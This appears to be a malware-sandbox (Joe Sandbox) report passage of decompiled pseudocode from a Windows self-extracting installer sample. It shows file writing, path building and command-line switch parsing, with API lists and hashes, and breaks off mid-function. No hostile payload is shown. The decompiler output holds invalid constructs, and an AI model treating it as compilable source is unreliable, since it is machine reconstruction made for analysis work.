Instruction addresses: 0x00174880, 0x0017488c, 0x00174894, 0x001748a0, 0x001748c9, 0x001748ce, 0x001748a2, 0x001748a8, 0x001748b7, 0x001748bc, 0x001748aa, 0x001748ac, 0x001748ac, 0x001748a8, 0x001748de, 0x001748e7, 0x0017490b, 0x001748ee, 0x001748f0, 0x00000000, 0x00174902

APIs
• CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00174A23,?,00174F67,*MEMCAB,00008000,00000180), ref: 001748DE
• CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00174F67,*MEMCAB,00008000,00000180), ref: 00174902
Memory Dump Source
• Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_170000_file.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 6abe94f12ee57d297e1ec7cba67a70b14d0c6389f6a43efdd7bd6685a3538882
• Instruction ID: 3aecd95c509afe44023281999b5faeb14257578cfde34ef92ee0aef379e9e215
• Opcode Fuzzy Hash: 6abe94f12ee57d297e1ec7cba67a70b14d0c6389f6a43efdd7bd6685a3538882
• Instruction Fuzzy Hash: E10178A3E1153426F32440284C88BB7442CCBDA635F1B4230BEEEA65D1D3644C4081E0
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 93%
E00174AD0(signed int _a4, void* _a8, long _a12) {
	signed int _t9;
	int _t12;
	signed int _t14;
	signed int _t15;
	void* _t20;
	struct HWND__* _t21;
	signed int _t24;
	signed int _t25;

	_t20 =  *0x17858c; // 0xb8
	_t9 = E00173680(_t20);
	if( *0x1791d8 == 0) {
		_push(_t24);
		_t12 = WriteFile( *(0x178d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
		if(_t12 != 0) {
			_t25 = _a12;
			if(_t25 != 0xffffffff) {
				_t14 =  *0x179400; // 0x109096
				_t15 = _t14 + _t25;
				 *0x179400 = _t15;
				if( *0x178184 != 0) {
					_t21 =  *0x178584; // 0x0
					if(_t21 != 0) {
						SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x1793f8, 0);
					}
				}
			}
		} else {
			_t25 = _t24 | 0xffffffff;
		}
		return _t25;
	} else {
		return _t9 | 0xffffffff;
	}
}

Instruction addresses: 0x00174ad5, 0x00174adb, 0x00174ae7, 0x00174aee, 0x00174b05, 0x00174b0d, 0x00174b14, 0x00174b1a, 0x00174b1c, 0x00174b21, 0x00174b2a, 0x00174b2f, 0x00174b31, 0x00174b39, 0x00174b54, 0x00174b54, 0x00174b39, 0x00174b2f, 0x00174b0f, 0x00174b0f, 0x00174b0f, 0x00174b5e, 0x00174ae9, 0x00174aed, 0x00174aed

APIs
  • Part of subcall function 00173680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0017369F
  • Part of subcall function 00173680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 001736B2
  • Part of subcall function 00173680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 001736DA
• WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00174B05
Memory Dump Source
• Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_170000_file.jbxd
Similarity
• API ID: MessagePeek$FileMultipleObjectsWaitWrite
• String ID:
• API String ID: 1084409-0
• Opcode ID: 900814330924ef4c992bad46fd0b393e7df096d165e2a534bbde513b07d28d02
• Instruction ID: ad094df40e043e7c6717ee5e15b8a02ff54771d1c4936e67e5a6eca41d525e96
• Opcode Fuzzy Hash: 900814330924ef4c992bad46fd0b393e7df096d165e2a534bbde513b07d28d02
• Instruction Fuzzy Hash: DF012931280205ABDB149F68DC09BA6B779AB44725F148225F93D975E0CB70DCD5CB90
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E0017658A(char* __ecx, void* __edx, char* _a4) {
				intOrPtr _t4;
				char* _t6;
				char* _t8;
				void* _t10;
				void* _t12;
				char* _t16;
				intOrPtr* _t17;
				void* _t18;
				char* _t19;

				_t16 = __ecx;          // destination path buffer
				_t10 = __edx;          // size of that buffer
				_t17 = __ecx;
				_t1 = _t17 + 1; // 0x178b3f
				_t12 = _t1;
				do {                   // inline strlen over the existing path
					_t4 =  *_t17;
					_t17 = _t17 + 1;
				} while (_t4 != 0);
				_t18 = _t17 - _t12;    // length of the existing path
				_t2 = _t18 + 1; // 0x178b40
				if(_t2 < __edx) {      // only continue while the buffer still has room
					_t19 = _t18 + __ecx;   // points at the terminating NUL
					if(_t19 > __ecx) {
						_t8 = CharPrevA(__ecx, _t19); // executed; last character of the path
						if( *_t8 != 0x5c) {    // 0x5c == '\\': add a separator if the path lacks one
							 *_t19 = 0x5c;
							_t19 =  &(_t19[1]);
						}
					}
					_t6 = _a4;
					 *_t19 = 0;
					while( *_t6 == 0x20) { // 0x20 == ' ': skip leading spaces of the component to append
						_t6 = _t6 + 1;
					}
					return E001716B3(_t16, _t10, _t6);  // append the trimmed component
				}
				return 0x8007007a;     // HRESULT_FROM_WIN32(ERROR_INSUFFICIENT_BUFFER)
			}

Addresses: 0x00176592 0x00176594 0x00176596 0x00176598 0x00176598 0x0017659b 0x0017659b 0x0017659d 0x0017659e 0x001765a2 0x001765a4 0x001765a9 0x001765b2 0x001765b6 0x001765ba 0x001765c3 0x001765c5 0x001765c8 0x001765c8 0x001765c3 0x001765c9 0x001765cc 0x001765d2 0x001765d1 0x001765d1 0x00000000 0x001765dc 0x00000000

APIs
• CharPrevA.USER32(00178B3E,00178B3F,00000001,00178B3E,-00000003,?,001760EC,00171140,?), ref: 001765BA
Memory Dump Source
• Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_170000_file.jbxd
Similarity
• API ID: CharPrev
• String ID:
• API String ID: 122130370-0
• Opcode ID: 6152a77c9df0ed4777d6804b3a1e1867bf663f4eff57a38ba41108b677a3e1d4
• Instruction ID: 506f6040169f9361186d460971537502c39c77e90fc2fa7bc0a5a94d848c3fdf
• Opcode Fuzzy Hash: 6152a77c9df0ed4777d6804b3a1e1867bf663f4eff57a38ba41108b677a3e1d4
• Instruction Fuzzy Hash: 71F042321046505BD336051D9884B76BFFD9BD6390F25816EF8DEC3209DB554C4693A0
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 93%
			E0017621E() {
				signed int _v8;
				char _v268;
				signed int _t5;
				void* _t9;
				void* _t13;
				void* _t19;
				void* _t20;
				signed int _t21;

				_t5 =  *0x178004; // 0x4ffa21aa (likely the MSVC /GS security cookie)
				_v8 = _t5 ^ _t21;   // cookie XORed with the frame pointer, re-checked before return
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {   // 0x104 == MAX_PATH
					0x4f0 = 2;   // decompiler artifact: assignment to the constant 0x4f0
					_t9 = E0017597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
				} else {
					E001744B9(0, 0x4f0, _t8, _t8, 0x10, _t8);   // error path: E001744B9 shows a message box (see subcall APIs)
					 *0x179124 = E00176285();   // E00176285 wraps GetLastError
					_t9 = 0;
				}
				return E00176CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);   // security-cookie check and return
			}

Addresses: 0x00176229 0x00176230 0x00176247 0x0017626a 0x00176272 0x00176249 0x00176255 0x0017625f 0x00176264 0x00176264 0x00176284

APIs
• GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0017623F
  • Part of subcall function 001744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00174518
  • Part of subcall function 001744B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00174554
  • Part of subcall function 00176285: GetLastError.KERNEL32(00175BBC), ref: 00176285
Memory Dump Source
• Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_170000_file.jbxd
Similarity
• API ID: DirectoryErrorLastLoadMessageStringWindows
• String ID:
• API String ID: 381621628-0
• Opcode ID: 01ba2e4012862fb85bd9bb855f73d37adbe9a7453b65da373d6f41881c20e1ec
• Instruction ID: dc4c00da1ebde0d843d301b61b714b9d149e3f3edf915ddd6c1c20308b20a5ac
• Opcode Fuzzy Hash: 01ba2e4012862fb85bd9bb855f73d37adbe9a7453b65da373d6f41881c20e1ec
• Instruction Fuzzy Hash: 23F0E9B0744208ABE790EB748D06FBE33BCDB54300F408469B98ED6082DF749DC48650
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00174B60(signed int _a4) {
    signed int _t9;
    signed int _t15;

    _t15 = _a4 * 0x18;
    if( *((intOrPtr*)(_t15 + 0x178d64)) != 1) {
        _t9 = FindCloseChangeNotification( *(_t15 + 0x178d74)); // executed
        if(_t9 == 0) {
            return _t9 | 0xffffffff;
        }
        *((intOrPtr*)(_t15 + 0x178d60)) = 1;
        return 0;
    }
    *((intOrPtr*)(_t15 + 0x178d60)) = 1;
    *((intOrPtr*)(_t15 + 0x178d68)) = 0;
    *((intOrPtr*)(_t15 + 0x178d70)) = 0;
    *((intOrPtr*)(_t15 + 0x178d6c)) = 0;
    return 0;
}

0x00174b66
0x00174b74
0x00174b98
0x00174ba0
0x00000000
0x00174bac
0x00174ba4
0x00000000
0x00174ba4
0x00174b78
0x00174b7e
0x00174b84
0x00174b8a
0x00000000

APIs
• FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00174FA1,00000000), ref: 00174B98
Memory Dump Source
• Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_170000_file.jbxd
Similarity
• API ID: ChangeCloseFindNotification
• String ID:
• API String ID: 2591292051-0
• Opcode ID: 3163ce6b0ba009b4cf6c551f5413c584283b10dbc529f724b34eb37f068b1e08
• Instruction ID: 4534ce1ff41ad4a2c61ac80b1348eb4f061c9223b225fb90edc41282ac9e9112
• Opcode Fuzzy Hash: 3163ce6b0ba009b4cf6c551f5413c584283b10dbc529f724b34eb37f068b1e08
• Instruction Fuzzy Hash: 4FF0F831680B089FC771DEBACC08652BBF4AAA53A5711492A946ED2194EB30AC41CB90
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E001766AE(CHAR* __ecx) {
    unsigned int _t1;

    _t1 = GetFileAttributesA(__ecx); // executed
    if(_t1 != 0xffffffff) {
        return !(_t1 >> 4) & 0x00000001;
    } else {
        return 0;
    }
}

0x001766b1
0x001766ba
0x001766c7
0x001766bc
0x001766be
0x001766be

APIs
• GetFileAttributesA.KERNELBASE(?,00174777,?,00174E38,?), ref: 001766B1
Memory Dump Source
• Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_170000_file.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 93e7a5d930c4421a83581e0b7ef7094eb15a2dce319894636e5195a741e4d13d
• Instruction ID: 01f94deb22c20ddda29f0bba8c1bd4ede3be06b3a6c8a317013c675170b502d5
• Opcode Fuzzy Hash: 93e7a5d930c4421a83581e0b7ef7094eb15a2dce319894636e5195a741e4d13d
• Instruction Fuzzy Hash: 08B09276222840426E2006316C2955A2861BBC123A7E85B90F03AC05E0CB3EC886D004
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00174CA0(long _a4) {
    void* _t2;

    _t2 = GlobalAlloc(0, _a4); // executed
    return _t2;
}

0x00174caa
0x00174cb1

APIs
• GlobalAlloc.KERNELBASE(00000000,?), ref: 00174CAA
Memory Dump Source
• Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_170000_file.jbxd
Similarity
• API ID: AllocGlobal
• String ID:
• API String ID: 3761449716-0
• Opcode ID: 1a93f7d025a10f1a39f2475edffe8c87315c3dcea7237b9907621988591fadfd
• Instruction ID: 9b2952618aa25510991c3bdc193e716f8b47d09656d49e340294c1524a211ce8
• Opcode Fuzzy Hash: 1a93f7d025a10f1a39f2475edffe8c87315c3dcea7237b9907621988591fadfd
• Instruction Fuzzy Hash: 3FB0123208420CB7CF001FC2EC09F893F6DFBC4761F540000F60C454508A7294908696
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00174CC0(void* _a4) {
                                                                                                                                                                                                    				void* _t2;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t2 = GlobalFree(_a4); // executed
                                                                                                                                                                                                    				return _t2;
                                                                                                                                                                                                    			}




0x00174cc8
0x00174ccf

APIs
Memory Dump Source
• Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_170000_file.jbxd
Similarity
• API ID: FreeGlobal
• String ID:
• API String ID: 2979337801-0
• Opcode ID: 7a48330777ca7a42e808818e449ffba473d4ab7d13524da4beedbd372a88cb3b
• Instruction ID: 8c6dcd4705196a6dd5ac75da0b0e2ffe0b01f34a964307236d6b3f57a7e9bccb
• Opcode Fuzzy Hash: 7a48330777ca7a42e808818e449ffba473d4ab7d13524da4beedbd372a88cb3b
• Instruction Fuzzy Hash: B1B0123104010CBB8F001B42EC088493F2DDBC02607400010F50C414218B3398918585
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 92%
    E00175C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
        signed int _v8;
        signed int _v12;
        CHAR* _v265;
        char _v266;
        char _v267;
        char _v268;
        CHAR* _v272;
        char _v276;
        signed int _v296;
        char _v556;
        signed int _t61;
        int _t63;
        char _t67;
        CHAR* _t69;
        signed int _t71;
        void* _t75;
        char _t79;
        void* _t83;
        void* _t85;
        void* _t87;
        intOrPtr _t88;
        void* _t100;
        intOrPtr _t101;
        CHAR* _t104;
        intOrPtr _t105;
        void* _t111;
        void* _t115;
        CHAR* _t118;
        void* _t119;
        void* _t127;
        CHAR* _t129;
        void* _t132;
        void* _t142;
        signed int _t143;
        CHAR* _t144;
        void* _t145;
        void* _t146;
        void* _t147;
        void* _t149;
        char _t155;
        void* _t157;
        void* _t162;
        void* _t163;
        char _t167;
        char _t170;
        CHAR* _t173;
        void* _t177;
        intOrPtr* _t183;
        intOrPtr* _t192;
        CHAR* _t199;
        void* _t200;
        CHAR* _t201;
        void* _t205;
        void* _t206;
        int _t209;
        void* _t210;
        void* _t212;
        void* _t213;
        CHAR* _t218;
        intOrPtr* _t219;
        intOrPtr* _t220;
        signed int _t221;
        signed int _t223;

        _t173 = __ecx;
        _t61 =  *0x178004; // 0x4ffa21aa
        _v8 = _t61 ^ _t221;
        _push(__ebx);
        _push(__esi);
        _push(__edi);
        _t209 = 1;
        if(__ecx == 0 ||  *__ecx == 0) {
            _t63 = 1;
        } else {
            L2:
            while(_t209 != 0) {
                _t67 =  *_t173;
                if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                    _t173 = CharNextA(_t173);
                    continue;
                }
                _v272 = _t173;
                if(_t67 == 0) {
                    break;
                } else {
                    _t69 = _v272;
                    _t177 = 0;
                    _t213 = 0;
                    _t163 = 0;
                    _t202 = 1;
                    do {
                        if(_t213 != 0) {
                            if(_t163 != 0) {
                                break;
                            } else {
                                goto L21;
                            }
                        } else {
                            _t69 =  *_t69;
                            if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                break;
                            } else {
                                _t69 = _v272;
                                L21:
                                _t155 =  *_t69;
                                if(_t155 != 0x22) {
                                    if(_t202 >= 0x104) {
                                        goto L106;
                                    } else {
                                         *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                        _t177 = _t177 + 1;
                                        _t202 = _t202 + 1;
                                                                                                                                                                                                    												_t157 = 1;
                                                                                                                                                                                                    												goto L30;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											if(_v272[1] == 0x22) {
                                                                                                                                                                                                    												if(_t202 >= 0x104) {
                                                                                                                                                                                                    													L106:
                                                                                                                                                                                                    													_t63 = 0;
                                                                                                                                                                                                    													L125:
                                                                                                                                                                                                    													_pop(_t210);
                                                                                                                                                                                                    													_pop(_t212);
                                                                                                                                                                                                    													_pop(_t162);
                                                                                                                                                                                                    													return E00176CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                    													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                                                                                                                                                                    													_t177 = _t177 + 1;
                                                                                                                                                                                                    													_t202 = _t202 + 1;
                                                                                                                                                                                                    													_t157 = 2;
                                                                                                                                                                                                    													goto L30;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												_t157 = 1;
                                                                                                                                                                                                    												if(_t213 != 0) {
                                                                                                                                                                                                    													_t163 = 1;
                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                    													_t213 = 1;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												goto L30;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								goto L131;
                                                                                                                                                                                                    								L30:
                                                                                                                                                                                                    								_v272 =  &(_v272[_t157]);
                                                                                                                                                                                                    								_t69 = _v272;
                                                                                                                                                                                                    							} while ( *_t69 != 0);
                                                                                                                                                                                                    							if(_t177 >= 0x104) {
                                                                                                                                                                                                    								E00176E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                                                                                                                                                                    								asm("int3");
                                                                                                                                                                                                    								_push(_t221);
                                                                                                                                                                                                    								_t222 = _t223;
                                                                                                                                                                                                    								_t71 =  *0x178004; // 0x4ffa21aa
                                                                                                                                                                                                    								_v296 = _t71 ^ _t223;
                                                                                                                                                                                                    								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                                                                                                                                                                    									0x4f0 = 2;
                                                                                                                                                                                                    									_t75 = E0017597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									E001744B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                                                                                                                                                                    									 *0x179124 = E00176285();
                                                                                                                                                                                                    									_t75 = 0;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								return E00176CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                                                                                                                                                                    								if(_t213 == 0) {
                                                                                                                                                                                                    									if(_t163 != 0) {
                                                                                                                                                                                                    										goto L34;
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										goto L40;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									if(_t163 != 0) {
                                                                                                                                                                                                    										L40:
                                                                                                                                                                                                    										_t79 = _v268;
                                                                                                                                                                                                    										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                                                                                                                                                                    											_t83 = CharUpperA(_v267) - 0x3f;
                                                                                                                                                                                                    											if(_t83 == 0) {
                                                                                                                                                                                                    												_t202 = 0x521;
                                                                                                                                                                                                    												E001744B9(0, 0x521, 0x171140, 0, 0x40, 0);
                                                                                                                                                                                                    												_t85 =  *0x178588; // 0x0
                                                                                                                                                                                                    												if(_t85 != 0) {
                                                                                                                                                                                                    													CloseHandle(_t85);
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												ExitProcess(0);
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											_t87 = _t83 - 4;
                                                                                                                                                                                                    											if(_t87 == 0) {
                                                                                                                                                                                                    												if(_v266 != 0) {
                                                                                                                                                                                                    													if(_v266 != 0x3a) {
                                                                                                                                                                                                    														goto L49;
                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                    														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                    														_t215 =  &_v268 + _t167;
                                                                                                                                                                                                    														_t183 =  &_v268 + _t167;
                                                                                                                                                                                                    														_t50 = _t183 + 1; // 0x1
                                                                                                                                                                                                    														_t202 = _t50;
                                                                                                                                                                                                    														do {
                                                                                                                                                                                                    															_t88 =  *_t183;
                                                                                                                                                                                                    															_t183 = _t183 + 1;
                                                                                                                                                                                                    														} while (_t88 != 0);
                                                                                                                                                                                                    														if(_t183 == _t202) {
                                                                                                                                                                                                    															goto L49;
                                                                                                                                                                                                    														} else {
                                                                                                                                                                                                    															_t205 = 0x5b;
                                                                                                                                                                                                    															if(E0017667F(_t215, _t205) == 0) {
                                                                                                                                                                                                    																L115:
                                                                                                                                                                                                    																_t206 = 0x5d;
                                                                                                                                                                                                    																if(E0017667F(_t215, _t206) == 0) {
                                                                                                                                                                                                    																	L117:
                                                                                                                                                                                                    																	_t202 =  &_v276;
                                                                                                                                                                                                    																	_v276 = _t167;
                                                                                                                                                                                                    																	if(E00175C17(_t215,  &_v276) == 0) {
                                                                                                                                                                                                    																		goto L49;
                                                                                                                                                                                                    																	} else {
                                                                                                                                                                                                    																		_t202 = 0x104;
                                                                                                                                                                                                    																		E00171680(0x178c42, 0x104, _v276 + _t167 +  &_v268);
                                                                                                                                                                                                    																	}
                                                                                                                                                                                                    																} else {
                                                                                                                                                                                                    																	_t202 = 0x5b;
                                                                                                                                                                                                    																	if(E0017667F(_t215, _t202) == 0) {
                                                                                                                                                                                                    																		goto L49;
                                                                                                                                                                                                    																	} else {
                                                                                                                                                                                                    																		goto L117;
                                                                                                                                                                                                    																	}
                                                                                                                                                                                                    																}
                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                    																_t202 = 0x5d;
                                                                                                                                                                                                    																if(E0017667F(_t215, _t202) == 0) {
                                                                                                                                                                                                    																	goto L49;
                                                                                                                                                                                                    																} else {
                                                                                                                                                                                                    																	goto L115;
                                                                                                                                                                                                    																}
                                                                                                                                                                                                    															}
			}
		}
	} else {
		*0x178a24 = 1;
	}
	goto L50;
} else {
	_t100 = _t87 - 1;
	if(_t100 == 0) {
		L98:
		if(_v266 != 0x3a) {
			goto L49;
		} else {
			_t170 = (0 | _v265 == 0x00000022) + 3;
			_t217 = &_v268 + _t170;
			_t192 = &_v268 + _t170;
			_t38 = _t192 + 1; // 0x1
			_t202 = _t38;
			do {
				_t101 = *_t192;
				_t192 = _t192 + 1;
			} while (_t101 != 0);
			if(_t192 == _t202) {
				goto L49;
			} else {
				_t202 = &_v276;
				_v276 = _t170;
				if(E00175C17(_t217, &_v276) == 0) {
					goto L49;
				} else {
					_t104 = CharUpperA(_v267);
					_t218 = 0x178b3e;
					_t105 = _v276;
					if(_t104 != 0x54) {
						_t218 = 0x178a3a;
					}
					E00171680(_t218, 0x104, _t105 + _t170 + &_v268);
					_t202 = 0x104;
					E0017658A(_t218, 0x104, 0x171140);
					if(E001731E0(_t218) != 0) {
						goto L50;
					} else {
						goto L106;
					}
				}
			}
		}
	} else {
		_t111 = _t100 - 0xa;
		if(_t111 == 0) {
			if(_v266 != 0) {
				if(_v266 != 0x3a) {
					goto L49;
				} else {
					_t199 = _v265;
					if(_t199 != 0) {
						_t219 = &_v265;
						do {
							_t219 = _t219 + 1;
							_t115 = CharUpperA(_t199) - 0x45;
							if(_t115 == 0) {
								*0x178a2c = 1;
							} else {
								_t200 = 2;
								_t119 = _t115 - _t200;
								if(_t119 == 0) {
									*0x178a30 = 1;
								} else {
									if(_t119 == 0xf) {
										*0x178a34 = 1;
									} else {
										_t209 = 0;
									}
								}
							}
							_t118 = *_t219;
							_t199 = _t118;
						} while (_t118 != 0);
					}
				}
			} else {
				*0x178a2c = 1;
			}
			goto L50;
		} else {
			_t127 = _t111 - 3;
			if(_t127 == 0) {
				if(_v266 != 0) {
					if(_v266 != 0x3a) {
						goto L49;
					} else {
						_t129 = CharUpperA(_v265);
						if(_t129 == 0x31) {
							goto L76;
						} else {
							if(_t129 == 0x41) {
								goto L83;
							} else {
								if(_t129 == 0x55) {
									goto L76;
								} else {
									goto L49;
								}
							}
						}
					}
				} else {
					L76:
					_push(2);
					_pop(1);
					L83:
					*0x178a38 = 1;
				}
				goto L50;
			} else {
				_t132 = _t127 - 1;
				if(_t132 == 0) {
					if(_v266 != 0) {
						if(_v266 != 0x3a) {
							if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff, &_v267, 0xffffffff) != 0) {
								goto L49;
							}
						} else {
							_t201 = _v265;
							*0x179a2c = 1;
							if(_t201 != 0) {
								_t220 = &_v265;
								do {
									_t220 = _t220 + 1;
									_t142 = CharUpperA(_t201) - 0x41;
									if(_t142 == 0) {
										_t143 = 2;
										*0x179a2c = *0x179a2c | _t143;
										goto L70;
									} else {
										_t145 = _t142 - 3;
										if(_t145 == 0) {
											*0x178d48 = *0x178d48 | 0x00000040;
										} else {
											_t146 = _t145 - 5;
											if(_t146 == 0) {
												*0x179a2c = *0x179a2c & 0xfffffffd;
												goto L70;
											} else {
												_t147 = _t146 - 5;
												if(_t147 == 0) {
													*0x179a2c = *0x179a2c & 0xfffffffe;
													goto L70;
												} else {
													_t149 = _t147;
													if(_t149 == 0) {
														*0x178d48 = *0x178d48 | 0x00000080;
													} else {
														if(_t149 == 3) {
															*0x179a2c = *0x179a2c | 0x00000004;
															L70:
															*0x178a28 = 1;
														} else {
															_t209 = 0;
														}
                                                                                                                                                                                                    																								}
                                                                                                                                                                                                    																							}
                                                                                                                                                                                                    																						}
                                                                                                                                                                                                    																					}
                                                                                                                                                                                                    																				}
                                                                                                                                                                                                    																				_t144 =  *_t220;
                                                                                                                                                                                                    																				_t201 = _t144;
                                                                                                                                                                                                    																			} while (_t144 != 0);
                                                                                                                                                                                                    																		}
                                                                                                                                                                                                    																	}
                                                                                                                                                                                                    																} else {
                                                                                                                                                                                                    																	 *0x179a2c = 3;
                                                                                                                                                                                                    																	 *0x178a28 = 1;
